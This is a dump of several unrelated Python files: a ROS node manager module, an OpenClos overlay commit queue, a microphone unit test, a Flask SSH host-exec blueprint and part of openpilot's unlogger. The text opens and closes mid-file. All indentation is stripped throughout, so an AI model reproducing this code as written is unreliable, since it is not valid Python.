local_addresses = ['localhost'] + roslib.network.get_local_addresses()
# check 127/8 and local addresses
result = hostname.startswith('127.') or hostname in local_addresses
with _LOCK:
HOSTS_CACHE[hostname] = result
return result
except socket.error:
# the hostname must be resolved => do it in a thread
if wait:
result = __is_local(hostname)
return result
else:
thread = threading.Thread(target=__is_local, args=((hostname,)))
thread.daemon = True
with _LOCK:
HOSTS_CACHE[hostname] = thread
thread.start()
return False
def __is_local(hostname):
'''
Test the hostname whether it is local or not. Uses socket.gethostbyname().
'''
try:
machine_addr = socket.gethostbyname(hostname)
except socket.gaierror:
with _LOCK:
HOSTS_CACHE[hostname] = False
return False
local_addresses = ['localhost'] + roslib.network.get_local_addresses()
# check 127/8 and local addresses
result = machine_addr.startswith('127.') or machine_addr in local_addresses
with _LOCK:
HOSTS_CACHE[hostname] = result
return result
def finish(*arg):
'''
Callback called on exit of the ros node.
'''
# close all ssh sessions
if _SSH_HANDLER is not None:
_SSH_HANDLER.close()
# save the launch history
if _HISTORY is not None:
try:
_HISTORY.storeAll()
except Exception as err:
print >> sys.stderr, "Error while store history: %s" % err
from node_manager_fkie.main_window import MainWindow
# stop all threads in the main window
if isinstance(_MAIN_FORM, MainWindow):
_MAIN_FORM.finish()
if _QAPP is not None:
_QAPP.exit()
def set_terminal_name(name):
'''
Change the terminal name.
@param name: New name of the terminal
@type name: C{str}
'''
sys.stdout.write("\x1b]2;%s\x07" % name)
def set_process_name(name):
'''
Change the process name.
@param name: New process name
@type name: C{str}
'''
try:
from ctypes import cdll, byref, create_string_buffer
libc = cdll.LoadLibrary('libc.so.6')
buff = create_string_buffer(len(name) + 1)
buff.value = name
libc.prctl(15, byref(buff), 0, 0, 0)
except:
pass
def init_settings():
global _SETTINGS
_SETTINGS = Settings()
def init_globals(masteruri):
'''
:return: True if the masteruri referred to localhost
:rtype: bool
'''
# initialize the global handler
global _SSH_HANDLER
global _SCREEN_HANDLER
global _START_HANDLER
global _NAME_RESOLUTION
global _HISTORY
global _FILE_WATCHER
global _FILE_WATCHER_PARAM
_SSH_HANDLER = SSHhandler()
_SCREEN_HANDLER = ScreenHandler()
_START_HANDLER = StartHandler()
_NAME_RESOLUTION = NameResolution()
_HISTORY = History()
_FILE_WATCHER = FileWatcher()
_FILE_WATCHER_PARAM = FileWatcher()
# test where the roscore is running (local or remote)
__is_local('localhost') # fill cache
return __is_local(get_hostname(masteruri)) # fill cache
def init_arg_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--version", action="version", version="%s %s" % ("%(prog)s", __version__))
parser.add_argument("-f", "--file", nargs=1, help="loads the given file as default on start")
parser.add_argument("-m", "--muri", nargs=1, default='', help="starts ROS master with given URI, usefull on hosts "
"with multiple interfaces. ROS_HOSTNAME will be set "
"to the host of this URI, but only if it is not an IP.")
group = parser.add_argument_group('echo')
group.add_argument("--echo", nargs=2, help="starts an echo dialog instead of node manager", metavar=('name', 'type'))
group.add_argument("--hz", action="store_true", help="shows only the Hz value instead of topic content in echo dialog")
group.add_argument("--ssh", action="store_true", help="connects via SSH")
return parser
def init_echo_dialog(prog_name, masteruri, topic_name, topic_type, hz=False, use_ssh=False):
'''
Intialize the environment to start an echo window.
'''
# start ROS-Master, if not currently running
# StartHandler._prepareROSMaster(masteruri)
name = '%s_echo' % prog_name
rospy.init_node(name, anonymous=True, log_level=rospy.INFO)
set_terminal_name(name)
set_process_name(name)
from node_manager_fkie.echo_dialog import EchoDialog
global _SSH_HANDLER
_SSH_HANDLER = SSHhandler()
return EchoDialog(topic_name, topic_type, hz, masteruri, use_ssh=use_ssh)
def init_main_window(prog_name, masteruri, launch_files=[]):
'''
Intialize the environment to start Node Manager.
'''
# start ROS-Master, if not currently running
StartHandler._prepareROSMaster(masteruri)
# setup the loglevel
try:
log_level = getattr(rospy, rospy.get_param('/%s/log_level' % prog_name, "INFO"))
except Exception as err:
print("Error while set the log level: %s\n->INFO level will be used!" % err)
log_level = rospy.INFO
rospy.init_node(prog_name, anonymous=False, log_level=log_level)
set_terminal_name(prog_name)
set_process_name(prog_name)
from node_manager_fkie.main_window import MainWindow
local_master = init_globals(masteruri)
return MainWindow(launch_files, not local_master, launch_files)
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# %%%%%%%%%%%%% MAIN %%%%%%%%
# %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def main(name):
'''
Start the NodeManager or EchoDialog.
:param name: the name propagated to the rospy.init_node()
:type name: str
'''
try:
from python_qt_binding.QtGui import QApplication
except:
try:
from python_qt_binding.QtWidgets import QApplication
except:
print >> sys.stderr, "please install 'python_qt_binding' package!!"
sys.exit(-1)
init_settings()
parser = init_arg_parser()
args = rospy.myargv(argv=sys.argv)
parsed_args = parser.parse_args(args[1:])
if parsed_args.muri:
masteruri = parsed_args.muri[0]
hostname = NameResolution.get_ros_hostname(masteruri)
os.environ['ROS_MASTER_URI'] = masteruri
if hostname:
os.environ['ROS_HOSTNAME'] = hostname
masteruri = settings().masteruri()
# Initialize Qt
global _QAPP
_QAPP = QApplication(sys.argv)
# decide to show main or echo dialog
global _MAIN_FORM
try:
if parsed_args.echo:
_MAIN_FORM = init_echo_dialog(name, masteruri, parsed_args.echo[0],
parsed_args.echo[1], parsed_args.hz,
parsed_args.ssh)
else:
_MAIN_FORM = init_main_window(name, masteruri, parsed_args.file)
except Exception as err:
sys.exit("%s" % err)
exit_code = 0
# resize and show the qt window
if not rospy.is_shutdown():
# change path for access to the images of descriptions
os.chdir(settings().PACKAGE_DIR)
# _MAIN_FORM.resize(1024, 720)
screen_size = QApplication.desktop().availableGeometry()
if (_MAIN_FORM.size().width() >= screen_size.width() or
_MAIN_FORM.size().height() >= screen_size.height() - 24):
_MAIN_FORM.showMaximized()
else:
_MAIN_FORM.show()
exit_code = -1
rospy.on_shutdown(finish)
exit_code = _QAPP.exec_()
return exit_code
|
overlayCommit.py | '''
Created on Feb 15, 2016
@author: yunli
'''
import traceback
import logging
from threading import Thread, Event, RLock
import concurrent.futures
import Queue
from sqlalchemy.orm import exc
from jnpr.openclos.overlay.overlayModel import OverlayDeployStatus
from jnpr.openclos.dao import Dao
from jnpr.openclos.loader import OpenClosProperty, loadLoggingConfig
from jnpr.openclos.common import SingletonBase
from jnpr.openclos.exception import DeviceRpcFailed, DeviceConnectFailed
from jnpr.openclos.deviceConnector import CachedConnectionFactory, NetconfConnection
DEFAULT_MAX_THREADS = 10
DEFAULT_DISPATCH_INTERVAL = 10
DEFAULT_DAO_CLASS = Dao
moduleName = 'overlayCommit'
loadLoggingConfig(appName=moduleName)
logger = logging.getLogger(moduleName)
class OverlayCommitJob():
def __init__(self, parent, deployStatusObject):
# Note we only hold on to the data from the deployStatusObject (deviceId, configlet, etc.).
# We are not holding reference to the deployStatusObject itself as it can become invalid when db session is out of scope
self.parent = parent
self.id = deployStatusObject.id
self.deviceId = deployStatusObject.overlay_device.id
self.deviceIp = deployStatusObject.overlay_device.address
self.deviceUser = deployStatusObject.overlay_device.username
self.devicePass = deployStatusObject.overlay_device.getCleartextPassword()
self.configlet = deployStatusObject.configlet
self.operation = deployStatusObject.operation
self.queueId = '%s:%s' % (self.deviceIp, self.deviceId)
def updateStatus(self, status, reason=None):
try:
with self.parent._dao.getReadWriteSession() as session:
statusObject = session.query(OverlayDeployStatus).filter(OverlayDeployStatus.id == self.id).one()
if statusObject.operation == "create":
statusObject.update(status, reason)
elif statusObject.operation == "delete":
if status == "success":
relatedStatusObjects = session.query(OverlayDeployStatus).filter(
OverlayDeployStatus.object_url == statusObject.object_url).filter(
OverlayDeployStatus.overlay_device_id == self.deviceId).all()
self.parent._dao.deleteObjects(session, relatedStatusObjects)
# If all devices are done, then delete the object
deployStatusCount = session.query(OverlayDeployStatus).filter(
OverlayDeployStatus.object_url == statusObject.object_url).count()
if deployStatusCount == 0:
objectTypeId = statusObject.getObjectTypeAndId()
obj = session.query(objectTypeId[0]).filter_by(id=objectTypeId[1]).one()
if obj:
session.delete(obj)
else:
statusObject.update(status, reason)
elif statusObject.operation == "update":
statusObject.update(status, reason)
## TODO: add hook to update the actual object
except Exception as exc:
logger.error("%s", exc)
logger.error('StackTrace: %s', traceback.format_exc())
def commit(self):
try:
# Note we don't want to hold the caller's session for too long since this function is potentially lengthy
# that is why we don't ask caller to pass a dbSession to us. Instead we get the session inside this method
# only long enough to update the status value
logger.info("Job %s: starting commit on device [%s]", self.id, self.queueId)
# first update the status to 'progress'
self.updateStatus("progress")
# now commit and set the result/reason accordingly
result = 'success'
reason = None
try:
with CachedConnectionFactory.getInstance().connection(NetconfConnection,
self.deviceIp,
username=self.deviceUser,
password=self.devicePass) as connector:
connector.updateConfig(self.configlet)
except DeviceConnectFailed as exc:
#logger.error("%s", exc)
#logger.error('StackTrace: %s', traceback.format_exc())
result = 'failure'
reason = exc.message
except DeviceRpcFailed as exc:
#logger.error("%s", exc)
#logger.error('StackTrace: %s', traceback.format_exc())
result = 'failure'
reason = exc.message
except Exception as exc:
#logger.error("%s", exc)
#logger.error('StackTrace: %s', traceback.format_exc())
result = 'failure'
reason = str(exc)
# commit is done so update the result
self.updateStatus(result, reason)
logger.info("Job %s: done with device [%s]", self.id, self.queueId)
# remove device id from cache
self.parent.markDeviceIdle(self.queueId)
except Exception as exc:
logger.error("Job %s: error '%s'", self.id, exc)
logger.error('StackTrace: %s', traceback.format_exc())
raise
class OverlayCommitQueue(SingletonBase):
def __init__(self, daoClass=DEFAULT_DAO_CLASS):
self._dao = daoClass.getInstance()
# event to stop from sleep
self.stopEvent = Event()
self.__lock = RLock()
self.__devicesInProgress = set()
self.__deviceQueues = {}
self.maxWorkers = DEFAULT_MAX_THREADS
self.dispatchInterval = DEFAULT_DISPATCH_INTERVAL
self.thread = Thread(target=self.dispatchThreadFunction, args=())
self.started = False
conf = OpenClosProperty().getProperties()
# iterate 'plugin' section of openclos.yaml and install routes on all plugins
if 'plugin' in conf:
plugins = conf['plugin']
for plugin in plugins:
if plugin['name'] == 'overlay':
maxWorkers = plugin.get('threadCount')
if maxWorkers is not None:
self.maxWorkers = maxWorkers
dispatchInterval = plugin.get('dispatchInterval')
if dispatchInterval is not None:
self.dispatchInterval = dispatchInterval
break
self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=self.maxWorkers)
def addJobs(self, deployStatusObjects):
jobs = []
for deployStatusObject in deployStatusObjects:
jobs.append(OverlayCommitJob(self, deployStatusObject))
logger.debug("Job %s: added to device [%s]", jobs[-1].id, jobs[-1].queueId)
with self.__lock:
for job in jobs:
if job.queueId not in self.__deviceQueues:
self.__deviceQueues[job.queueId] = Queue.Queue()
self.__deviceQueues[job.queueId].put(job)
return jobs
'''
To be used by unit test only
'''
def _getDeviceQueues(self):
return self.__deviceQueues
def runJobs(self):
# check device queues (round robin)
# Note we only hold on to the lock long enough to retrieve the job from the queue.
# Then we release the lock before we do the actual commit
with self.__lock:
toBeDeleted = []
for queueId, deviceQueue in self.__deviceQueues.iteritems():
# find an idle device
if queueId not in self.__devicesInProgress:
self.__devicesInProgress.add(queueId)
logger.debug("Device [%s] has NO commit in progress. Prepare for commit", queueId)
# retrieve the job
try:
job = deviceQueue.get_nowait()
# start commit progress
self.executor.submit(job.commit)
deviceQueue.task_done()
if deviceQueue.empty():
logger.debug("Device [%s] job queue is empty", queueId)
# Note don't delete the empty job queues within the iteration.
toBeDeleted.append(queueId)
except Queue.Empty as exc:
logger.debug("Device [%s] job queue is empty", queueId)
# Note don't delete the empty job queues within the iteration.
toBeDeleted.append(queueId)
else:
logger.debug("Device [%s] has commit in progress. Skipped", queueId)
# Now it is safe to delete all empty job queues
for queueId in toBeDeleted:
logger.debug("Deleting job queue for device [%s]", queueId)
del self.__deviceQueues[queueId]
def markDeviceIdle(self, queueId):
with self.__lock:
self.__devicesInProgress.discard(queueId)
def start(self):
with self.__lock:
if self.started:
return
else:
self.started = True
logger.info("Starting OverlayCommitQueue...")
self.thread.start()
logger.info("OverlayCommitQueue started")
def stop(self):
logger.info("Stopping OverlayCommitQueue...")
self.stopEvent.set()
self.executor.shutdown()
with self.__lock:
if self.started:
self.thread.join()
logger.info("OverlayCommitQueue stopped")
def dispatchThreadFunction(self):
try:
while True:
self.stopEvent.wait(self.dispatchInterval)
if not self.stopEvent.is_set():
self.runJobs()
else:
logger.debug("OverlayCommitQueue: stopEvent is set")
return
except Exception as exc:
logger.error("Encounted error '%s' on OverlayCommitQueue", exc)
raise
# def main():
# conf = OpenClosProperty().getProperties()
# dao = Dao.getInstance()
# from jnpr.openclos.overlay.overlay import Overlay
# overlay = Overlay(conf, Dao.getInstance())
# with dao.getReadWriteSession() as session:
# d1 = overlay.createDevice(session, 'd1', 'description for d1', 'spine', '192.168.48.201', '1.1.1.1', 'pod1', 'test', 'foobar')
# d2 = overlay.createDevice(session, 'd2', 'description for d2', 'spine', '192.168.48.202', '1.1.1.2', 'pod1', 'test', 'foobar')
# d1_id = d1.id
# d2_id = d2.id
# f1 = overlay.createFabric(session, 'f1', '', 65001, '2.2.2.2', [d1, d2])
# f1_id = f1.id
# f2 = overlay.createFabric(session, 'f2', '', 65002, '3.3.3.3', [d1, d2])
# f2_id = f2.id
# t1 = overlay.createTenant(session, 't1', '', f1)
# t1_id = t1.id
# t2 = overlay.createTenant(session, 't2', '', f2)
# t2_id = t2.id
# v1 = overlay.createVrf(session, 'v1', '', 100, '1.1.1.1', t1)
# v1_id = v1.id
# v2 = overlay.createVrf(session, 'v2', '', 101, '1.1.1.2', t2)
# v2_id = v2.id
# n1 = overlay.createNetwork(session, 'n1', '', v1, 1000, 100, False)
# n1_id = n1.id
# n2 = overlay.createNetwork(session, 'n2', '', v1, 1001, 101, False)
# n2_id = n2.id
# commitQueue = OverlayCommitQueue.getInstance()
# commitQueue.dispatchInterval = 1
# commitQueue.start()
# with dao.getReadWriteSession() as session:
# status_db = session.query(OverlayDeployStatus).all()
# for s in status_db:
# commitQueue.addJob(s)
# raw_input("Press any key to stop...")
# commitQueue.stop()
# if __name__ == '__main__':
# main()
|
test_sync_microphone.py | import logging
import numpy as np
import sys
import threading
import unittest
from typing import Generator
from cltl.backend.api.microphone import MIC_RESOURCE_NAME, AudioParameters
from cltl.backend.impl.sync_microphone import SynchronizedMicrophone
from cltl.backend.spi.audio import AudioSource
from cltl.combot.infra.resource.threaded import ThreadedResourceManager
logger = logging.getLogger(__name__)
logger.addHandler(logging.StreamHandler(stream=sys.stdout))
logger.setLevel(logging.DEBUG)
def wait(lock: threading.Event):
if not lock.wait(699):
raise unittest.TestCase.failureException("Latch timed out")
class TestSource(AudioSource):
def __init__(self, processing: threading.Event = None,
pause_processing: threading.Event = None,
finished: threading.Event = None):
self.processing = processing
self.pause_processing = pause_processing
self.finished = finished
@property
def rate(self):
return 200
@property
def channels(self):
return 1
@property
def frame_size(self):
return 2
@property
def depth(self):
return 2
@property
def audio(self) -> Generator[np.array, None, None]:
for i in range(10):
if (not self.processing or self.processing.isSet()) and self.pause_processing:
wait(self.pause_processing)
if self.processing and i == 4:
self.processing.set()
yield np.full((2,), i, dtype=np.int16)
if self.finished:
self.finished.set()
yield None
class SynchronizedMicrophoneTest(unittest.TestCase):
def setUp(self):
source = TestSource()
self.resource_manager = ThreadedResourceManager()
self.mic = SynchronizedMicrophone(source, self.resource_manager)
self.mic.start()
def tearDown(self):
self.mic.stop()
def test_listen(self):
self.assertFalse(self.mic.muted)
with self.mic.listen() as (mic_audio, params):
audio = [frame for frame in mic_audio]
parameters = params
self.assertEqual(11, len(audio))
self.assertIsNone(audio[10])
self.assertTrue(all(frame.shape == (2,) for frame in audio[:-1]))
self.assertEqual([i for i in range(10)], [frame[0] for frame in audio[:-1]])
self.assertEqual(AudioParameters(200, 1, 2, 2), parameters)
self.assertFalse(self.mic.muted)
def test_mute(self):
audio_running = threading.Event()
muted = threading.Event()
source = TestSource(processing=audio_running, pause_processing=muted)
self.resource_manager = ThreadedResourceManager()
self.mic = SynchronizedMicrophone(source, self.resource_manager)
def mute_mic():
wait(audio_running)
self.mic.mute()
muted.set()
mute_thread = threading.Thread(name="mute", target=mute_mic)
self.mic.start()
mute_thread.start()
self.assertFalse(self.mic.muted)
with self.mic.listen() as (mic_audio, params):
audio = [frame for frame in mic_audio]
self.assertEqual(7, len(audio))
self.assertIsNone(audio[6])
self.assertTrue(all(frame.shape == (2,) for frame in audio[:-1]))
self.assertEqual([i for i in range(6)], [frame[0] for frame in audio[:-1]])
self.assertTrue(self.mic.muted)
def test_mute_with_readers(self):
"""
Test that mic is only muted when readers are finished.
* Start audio
* Wait until audio is processing
* Start reader and acquire reader lock
* Delay audio until mute
* Call mute
* Test that not muted
* Wait until audio is finished
* Test that not muted
* Release reader lock and stop reader
* Await muted
* Test mic is muted
"""
audio_running = threading.Event()
audio_finished = threading.Event()
reader_started = threading.Event()
reader_finish = threading.Event()
mute = threading.Event()
muted = threading.Event()
def mute_mic():
wait(reader_started)
wait(mute)
mic.mute()
muted.set()
mute_thread = threading.Thread(name="mute", target=mute_mic)
def reader():
wait(audio_running)
with resource_manager.get_read_lock(MIC_RESOURCE_NAME):
reader_started.set()
wait(reader_finish)
reader_thread = threading.Thread(name="reader", target=reader)
source = TestSource(processing=audio_running, pause_processing=mute, finished=audio_finished)
resource_manager = ThreadedResourceManager()
mic = SynchronizedMicrophone(source, resource_manager)
def run_mic():
mic.start()
with mic.listen() as (mic_audio, params):
[frame for frame in mic_audio]
mic_thread = threading.Thread(name="mic", target=run_mic)
mic_thread.start()
reader_thread.start()
mute_thread.start()
wait(reader_started)
self.assertFalse(mic.muted)
self.assertUnset(audio_finished)
mute.set()
self.assertFalse(mic.muted)
self.assertSet(audio_finished)
self.assertUnset(muted)
self.assertFalse(mic.muted)
reader_finish.set()
self.assertSet(muted)
self.assertTrue(mic.muted)
def assertUnset(self, lock):
self.assertFalse(lock.wait(0.1))
def assertSet(self, lock):
self.assertTrue(lock.wait(0.1))
|
host_exec.py | from flask import Blueprint, request
from apps.assets.models import HostExecTemplate, Host
from libs.tools import json_response, JsonParser, Argument, QueuePool
from libs.ssh import ssh_exec_command_with_stream, get_ssh_client
from public import db
from libs.decorators import require_permission
from threading import Thread
import json
import uuid
blueprint = Blueprint(__name__, __name__)
@blueprint.route('/tpl/', methods=['GET'])
@require_permission('assets_host_exec_view | assets_host_exec | assets_host_exec_tpl_view')
def get():
form, error = JsonParser(Argument('page', type=int, default=1, required=False),
Argument('pagesize', type=int, default=10, required=False),
Argument('tpl_query', type=dict, required=False),).parse(request.args)
if error is None:
tpl_data = HostExecTemplate.query
if form.page == -1:
return json_response({'data': [x.to_json() for x in tpl_data.all()], 'total': -1})
if form.tpl_query['name_field']:
tpl_data = tpl_data.filter(HostExecTemplate.tpl_name.like('%{}%'.format(form.tpl_query['name_field'])))
if form.tpl_query['type_field']:
tpl_data = tpl_data.filter_by(tpl_type=form.tpl_query['type_field'])
result = tpl_data.limit(form.pagesize).offset((form.page - 1) * form.pagesize).all()
return json_response({'data': [x.to_json() for x in result], 'total': tpl_data.count()})
return json_response(message=error)
@blueprint.route('/tpl/', methods=['POST'])
@require_permission('assets_host_exec_tpl_add')
def post():
form, error = JsonParser('tpl_name', 'tpl_type', 'tpl_content',
Argument('tpl_desc', nullable=True, required=False)).parse()
if error is None:
tpl = HostExecTemplate(**form)
tpl.save()
return json_response(tpl)
return json_response(message=error)
@blueprint.route('/tpl/<int:tpl_id>', methods=['DELETE'])
@require_permission('assets_host_exec_tpl_del')
def delete(tpl_id):
HostExecTemplate.query.get_or_404(tpl_id).delete()
return json_response()
@blueprint.route('/tpl/<int:tpl_id>', methods=['PUT'])
@require_permission('assets_host_exec_tpl_edit')
def put(tpl_id):
form, error = JsonParser('tpl_name', 'tpl_type', 'tpl_content',
Argument('tpl_desc', nullable=True, required=False)).parse()
if error is None:
tpl = HostExecTemplate.query.get_or_404(tpl_id)
tpl.update(**form)
return json_response(tpl)
return json_response(message=error)
@blueprint.route('/tpl_type', methods=['GET'])
@require_permission('assets_host_exec_view | assets_host_exec_tpl_view')
def fetch_tpl_type():
types = db.session.query(HostExecTemplate.tpl_type.distinct().label('tpl_type')).all()
return json_response([x.tpl_type for x in types])
@blueprint.route('/exec_command/<string:token>', methods=['DELETE'])
@require_permission('assets_host_exec')
def exec_delete(token):
q = QueuePool.get_queue(token)
if q:
q.destroy()
return json_response()
@blueprint.route('/exec_command', methods=['POST'])
@require_permission('assets_host_exec')
def exec_host_command():
form, error = JsonParser('hosts_id', 'command').parse()
if error is None:
ip_list = Host.query.filter(Host.id.in_(tuple(form.hosts_id))).all()
token = uuid.uuid4().hex
q = QueuePool.make_queue(token, len(ip_list))
for h in ip_list:
Thread(target=hosts_exec, args=(q, h.ssh_ip, h.ssh_port, form.command)).start()
return json_response(token)
return json_response(message=error)
def hosts_exec(q, ip, port, command):
key = '%s:%s' % (ip, port)
try:
ssh_client = get_ssh_client(ip, port)
q.destroyed.append(ssh_client.close)
output = ssh_exec_command_with_stream(ssh_client, command)
for line in output:
q.put({key: line})
q.put({key: '\n** 执行完成 **'})
q.done()
except Exception as e:
q.put({key: '%s\n' % e})
q.put({key: '\n** 执行异常结束 **'})
q.done()
|
unlogger.py | #!/usr/bin/env python3
import argparse
import os
import sys
import zmq
import time
import signal
import multiprocessing
from uuid import uuid4
from collections import namedtuple
from collections import deque
from datetime import datetime
from cereal import log as capnp_log
from cereal.services import service_list
from cereal.messaging import pub_sock, MultiplePublishersError
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
from common import realtime
from common.transformations.camera import eon_f_frame_size, tici_f_frame_size
from tools.lib.kbhit import KBHit
from tools.lib.logreader import MultiLogIterator
from tools.lib.route import Route
from tools.lib.framereader import rgb24toyuv420
from tools.lib.route_framereader import RouteFrameReader
# Commands.
SetRoute = namedtuple("SetRoute", ("name", "start_time", "data_dir"))
SeekAbsoluteTime = namedtuple("SeekAbsoluteTime", ("secs",))
SeekRelativeTime = namedtuple("SeekRelativeTime", ("secs",))
TogglePause = namedtuple("TogglePause", ())
StopAndQuit = namedtuple("StopAndQuit", ())
VIPC_RGB = "rgb"
VIPC_YUV = "yuv"
class UnloggerWorker(object):
def __init__(self):
self._frame_reader = None
self._cookie = None
self._readahead = deque()
def run(self, commands_address, data_address, pub_types):
zmq.Context._instance = None
commands_socket = zmq.Context.instance().socket(zmq.PULL)
commands_socket.connect(commands_address)
data_socket = zmq.Context.instance().socket(zmq.PUSH)
data_socket.connect(data_address)
poller = zmq.Poller()
poller.register(commands_socket, zmq.POLLIN)
# We can't publish frames without roadEncodeIdx, so add when it's missing.
if "roadCameraState" in pub_types:
pub_types["roadEncodeIdx"] = None
# gc.set_debug(gc.DEBUG_LEAK | gc.DEBUG_OBJECTS | gc.DEBUG_STATS | gc.DEBUG_SAVEALL |
# gc.DEBUG_UNCOLLECTABLE)
# TODO: WARNING pycapnp leaks memory all over the place after unlogger runs for a while, gc
# pauses become huge because there are so many tracked objects solution will be to switch to new
# cython capnp
try:
route = None
while True:
while poller.poll(0.) or route is None:
cookie, cmd = commands_socket.recv_pyobj()
route = self._process_commands(cmd, route, pub_types)
# **** get message ****
self._read_logs(cookie, pub_types)
self._send_logs(data_socket)
finally:
if self._frame_reader is not None:
self._frame_reader.close()
data_socket.close()
commands_socket.close()
def _read_logs(self, cookie, pub_types):
fullHEVC = capnp_log.EncodeIndex.Type.fullHEVC
lr = self._lr
while len(self._readahead) < 1000:
route_time = lr.tell()
msg = next(lr)
typ = msg.which()
if typ not in pub_types:
continue
if typ == "liveMapData":
print(msg)
# **** special case certain message types ****
if typ == "roadEncodeIdx" and msg.roadEncodeIdx.type == fullHEVC:
# this assumes the roadEncodeIdx always comes before the frame
self._frame_id_lookup[
msg.roadEncodeIdx.frameId] = msg.roadEncodeIdx.segmentNum, msg.roadEncodeIdx.segmentId
#print "encode", msg.roadEncodeIdx.frameId, len(self._readahead), route_time
self._readahead.appendleft((typ, msg, route_time, cookie))
def _send_logs(self, data_socket):
while len(self._readahead) > 500:
typ, msg, route_time, cookie = self._readahead.pop()
smsg = msg.as_builder()
if typ == "roadCameraState":
frame_id = msg.roadCameraState.frameId
# Frame exists, make sure we have a framereader.
# load the frame readers as needed
s1 = time.time()
try:
img = self._frame_reader.get(frame_id, pix_fmt="rgb24")
except Exception:
img = None
fr_time = time.time() - s1
if fr_time > 0.05:
print("FRAME(%d) LAG -- %.2f ms" % (frame_id, fr_time*1000.0))
if img is not None:
extra = (smsg.roadCameraState.frameId, smsg.roadCameraState.timestampSof, smsg.roadCameraState.timestampEof)
# send YUV frame
if os.getenv("YUV") is not None:
img_yuv = rgb24toyuv420(img)
data_socket.send_pyobj((cookie, VIPC_YUV, msg.logMonoTime, route_time, extra), flags=zmq.SNDMORE)
data_socket.send(img_yuv.flatten().tobytes(), copy=False)
img = img[:, :, ::-1] # Convert RGB to BGR, which is what the camera outputs
img = img.flatten()
bts = img.tobytes()
smsg.roadCameraState.image = bts
# send RGB frame
data_socket.send_pyobj((cookie, VIPC_RGB, msg.logMonoTime, route_time, extra), flags=zmq.SNDMORE)
data_socket.send(bts, copy=False)
data_socket.send_pyobj((cookie, typ, msg.logMonoTime, route_time), flags=zmq.SNDMORE)
data_socket.send(smsg.to_bytes(), copy=False)
def _process_commands(self, cmd, route, pub_types):
seek_to = None
if route is None or (isinstance(cmd, SetRoute) and route.name != cmd.name):
seek_to = cmd.start_time
route = Route(cmd.name, cmd.data_dir)
self._lr = MultiLogIterator(route.log_paths(), wraparound=True)
if self._frame_reader is not None:
self._frame_reader.close()
if "roadCameraState" in pub_types or "roadEncodeIdx" in pub_types:
# reset frames for a route
self._frame_id_lookup = {}
self._frame_reader = RouteFrameReader(
route.camera_paths(), None, self._frame_id_lookup, readahead=True)
# always reset this on a seek
if isinstance(cmd, SeekRelativeTime):
seek_to = self._lr.tell() + cmd.secs
elif isinstance(cmd, SeekAbsoluteTime):
seek_to = cmd.secs
elif isinstance(cmd, StopAndQuit):
exit()
if seek_to is not None:
print("seeking", seek_to)
if not self._lr.seek(seek_to):
print("Can't seek: time out of bounds")
else:
next(self._lr) # ignore one
return route
def _get_address_send_func(address):
sock = pub_sock(address)
return sock.send
def _get_vipc_server(length):
w, h = {3 * w * h: (w, h) for (w, h) in [tici_f_frame_size, eon_f_frame_size]}[length]
vipc_server = VisionIpcServer("camerad")
vipc_server.create_buffers(VisionStreamType.VISION_STREAM_RGB_BACK, 4, True, w, h)
vipc_server.create_buffers(VisionStreamType.VISION_STREAM_YUV_BACK, 40, False, w, h)
vipc_server.start_listener()
return vipc_server
def unlogger_thread(command_address, forward_commands_address, data_address, run_realtime,
address_mapping, publish_time_length, bind_early, no_loop, no_visionipc):
# Clear context to avoid problems with multiprocessing.
zmq.Context._instance = None
context = zmq.Context.instance()
command_sock = context.socket(zmq.PULL)
command_sock.bind(command_address)
forward_commands_socket = context.socket(zmq.PUSH)
forward_commands_socket.bind(forward_commands_address)
data_socket = context.socket(zmq.PULL)
data_socket.bind(data_address)
# Set readahead to a reasonable number.
data_socket.setsockopt(zmq.RCVHWM, 10000)
poller = zmq.Poller()
poller.register(command_sock, zmq.POLLIN)
poller.register(data_socket, zmq.POLLIN)
if bind_early:
send_funcs = {
typ: _get_address_send_func(address)
for typ, address in address_mapping.items()
}
# Give subscribers a chance to connect.
time.sleep(0.1)
else:
send_funcs = {}
start_time = float("inf")
printed_at = 0
generation = 0
paused = False
reset_time = True
prev_msg_time = None
vipc_server = None
while True:
evts = dict(poller.poll())
if command_sock in evts:
cmd = command_sock.recv_pyobj()
if isinstance(cmd, TogglePause):
paused = not paused
if paused:
poller.modify(data_socket, 0)
else:
poller.modify(data_socket, zmq.POLLIN)
else:
# Forward the command the the log data thread.
# TODO: Remove everything on data_socket.
generation += 1
forward_commands_socket.send_pyobj((generation, cmd))
if isinstance(cmd, StopAndQuit):
return
reset_time = True
elif data_socket in evts:
msg_generation, typ, msg_time, route_time, *extra = data_socket.recv_pyobj(flags=zmq.RCVMORE)
msg_bytes = data_socket.recv()
if msg_generation < generation:
# Skip packets.
continue
if no_loop and prev_msg_time is not None and prev_msg_time > msg_time + 1e9:
generation += 1
forward_commands_socket.send_pyobj((generation, StopAndQuit()))
return
prev_msg_time = msg_time
msg_time_seconds = msg_time * 1e-9
if reset_time:
msg_start_time = msg_time_seconds
real_start_time = realtime.sec_since_boot()
start_time = min(start_time, msg_start_time)
reset_time = False
if publish_time_length and msg_time_seconds - start_time > publish_time_length:
generation += 1
forward_commands_socket.send_pyobj((generation, StopAndQuit()))
return
# Print time.
if abs(printed_at - route_time) > 5.:
print("at", route_time)
printed_at = route_time
if typ not in send_funcs and typ not in [VIPC_RGB, VIPC_YUV]:
if typ in address_mapping:
# Remove so we don't keep printing warnings.
address = address_mapping.pop(typ)
try:
print("binding", typ)
send_funcs[typ] = _get_address_send_func(address)
except Exception as e:
print("couldn't replay {}: {}".format(typ, e))
continue
else:
# Skip messages that we are not registered to publish.
continue
# Sleep as needed for real time playback.
if run_realtime:
msg_time_offset = msg_time_seconds - msg_start_time
real_time_offset = realtime.sec_since_boot() - real_start_time
lag = msg_time_offset - real_time_offset
if lag > 0 and lag < 30: # a large jump is OK, likely due to an out of order segment
if lag > 1:
print("sleeping for", lag)
time.sleep(lag)
elif lag < -1:
# Relax the real time schedule when we slip far behind.
reset_time = True
# Send message.
try:
if typ in [VIPC_RGB, VIPC_YUV]:
if not no_visionipc:
if vipc_server is None:
vipc_server = _get_vipc_server(len(msg_bytes))
